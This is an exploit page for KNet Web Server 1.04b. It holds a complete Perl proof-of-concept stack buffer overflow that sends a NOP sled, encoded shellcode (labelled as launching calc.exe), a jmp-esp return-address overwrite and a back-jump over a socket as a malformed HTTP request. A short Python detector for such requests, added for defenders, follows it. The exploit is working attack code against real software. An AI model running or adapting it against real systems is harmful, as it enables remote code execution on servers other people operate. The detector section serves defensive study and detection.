KNet Web Server 1.04b - Stack Corruption BoF
Source: http://www.justanotherhacker.com  Author: Wireghoul  Published: 2013-04-15

#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3

use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.com\n";
die "Usage $0 <host> <port>\n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$port\n";

# Shellcode for calc.exe
$shellcode=
"\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x78\x68\x4e\x69\x45\x50\x73\x30" .
"\x63\x30\x61\x70\x6e\x69\x78\x65\x75\x61\x39\x42\x62\x44" .
"\x6c\x4b\x51\x42\x34\x70\x4e\x6b\x72\x72\x46\x6c\x4e\x6b" .
"\x71\x42\x37\x64\x4e\x6b\x44\x32\x36\x48\x54\x4f\x4e\x57" .
"\x53\x7a\x35\x76\x76\x51\x39\x6f\x44\x71\x4b\x70\x4e\x4c" .
"\x77\x4c\x35\x31\x73\x4c\x47\x72\x64\x6c\x67\x50\x4a\x61" .
"\x78\x4f\x54\x4d\x33\x31\x68\x47\x49\x72\x6a\x50\x73\x62" .
"\x63\x67\x6c\x4b\x52\x72\x66\x70\x6e\x6b\x53\x72\x77\x4c" .
"\x63\x31\x48\x50\x6e\x6b\x73\x70\x64\x38\x6e\x65\x69\x50" .
"\x52\x54\x50\x4a\x65\x51\x48\x50\x56\x30\x4c\x4b\x70\x48" .
"\x47\x68\x4c\x4b\x42\x78\x37\x50\x66\x61\x78\x53\x39\x73" .
"\x77\x4c\x57\x39\x4c\x4b\x75\x64\x4c\x4b\x77\x71\x38\x56" .
"\x70\x31\x59\x6f\x76\x51\x39\x50\x6c\x6c\x6f\x31\x6a\x6f" .
"\x34\x4d\x53\x31\x78\x47\x45\x68\x79\x70\x42\x55\x6b\x44" .
"\x77\x73\x61\x6d\x59\x68\x47\x4b\x51\x6d\x34\x64\x62\x55" .
"\x4d\x32\x31\x48\x4c\x4b\x71\x48\x47\x54\x37\x71\x4e\x33" .
"\x43\x56\x4e\x6b\x76\x6c\x32\x6b\x6c\x4b\x70\x58\x57\x6c" .
"\x36\x61\x79\x43\x6e\x6b\x73\x34\x6e\x6b\x33\x31\x4a\x70" .
"\x4b\x39\x73\x74\x34\x64\x54\x64\x63\x6b\x31\x4b\x65\x31" .
"\x33\x69\x72\x7a\x70\x51\x39\x6f\x69\x70\x70\x58\x31\x4f" .
"\x52\x7a\x6c\x4b\x36\x72\x58\x6b\x6b\x36\x73\x6d\x63\x5a" .
"\x55\x51\x4c\x4d\x6b\x35\x6c\x79\x35\x50\x63\x30\x65\x50" .
"\x66\x30\x35\x38\x46\x51\x6e\x6b\x50\x6f\x4c\x47\x79\x6f" .
"\x6e\x35\x4d\x6b\x5a\x50\x68\x35\x6f\x52\x62\x76\x42\x48" .
"\x6f\x56\x6d\x45\x4f\x4d\x6f\x6d\x4b\x4f\x7a\x75\x75\x6c" .
"\x66\x66\x31\x6c\x74\x4a\x6f\x70\x79\x6b\x4b\x50\x52\x55" .
"\x53\x35\x6d\x6b\x50\x47\x36\x73\x42\x52\x52\x4f\x72\x4a" .
"\x45\x50\x72\x73\x6b\x4f\x6b\x65\x30\x63\x33\x51\x52\x4c" .
"\x50\x63\x64\x6e\x51\x75\x42\x58\x45\x35\x57\x70\x41\x41";

$dist=1003-length($shellcode);
$payload = "\x90"x$dist; # Distance to overwrite EIP
$payload.=$shellcode;
$payload.="\x90" x 8; #Spacer between EIP and shellcode
$payload.= "\x53\x93\x42\x7e"; #Overwrite EIP with jmp esp
$payload.="\x90\x90\x90\x90\xE9\xF4\xFC\xFF\xFF"; # stack padding + BP + near jmp -300 (back into the sled/shellcode)
$payload.=" / HTTP/1.0\r\n\r\n"; # Needs to be a valid HTTP request

print $sock $payload;
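As an added defender-side example (not part of Wireghoul's PoC), the following Python inspects a raw HTTP request for the shape this exploit relies on: an oversized request line, non-printable bytes where the method token should be, and a long run of 0x90 NOP bytes ahead of the " / HTTP/1.0" tail. The thresholds and both sample requests are constructed assumptions, not traffic from the original page.

```python
import re

# Assumed thresholds for illustration: the PoC needs roughly 1003 bytes
# before it reaches the saved return address, so a 512-byte request line
# limit leaves ample margin for legitimate URIs while catching this layout.
MAX_REQUEST_LINE = 512
NOP_SLED_MIN = 16  # x86 NOP (0x90) runs shorter than this are ignored


def inspect_request(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request; empty means clean."""
    findings = []
    line, _, _ = raw.partition(b"\r\n")  # only the request line matters here

    if len(line) > MAX_REQUEST_LINE:
        findings.append("request line too long: %d bytes" % len(line))

    # A request line is printable ASCII: METHOD SP target SP HTTP/x.y
    if any(b < 0x20 or b > 0x7E for b in line):
        findings.append("non-printable bytes in request line")

    # The PoC front-loads the request with a NOP sled to land in its shellcode.
    sled = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, line)
    if sled:
        findings.append("NOP sled of %d bytes at offset %d"
                        % (len(sled.group(0)), sled.start()))

    # Anything that is not METHOD SP target SP HTTP/1.x is malformed.
    if not re.fullmatch(rb"[A-Z]{3,10} \S+ HTTP/1\.[01]", line):
        findings.append("request line is not METHOD SP target SP HTTP/1.x")

    return findings


# Constructed samples (not captured traffic): a normal request and one shaped
# like the PoC, with filler bytes standing in for the shellcode and EIP value.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: example\r\n\r\n"
SUSPECT = b"\x90" * 600 + b"A" * 400 + b" / HTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req) or "clean")
```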
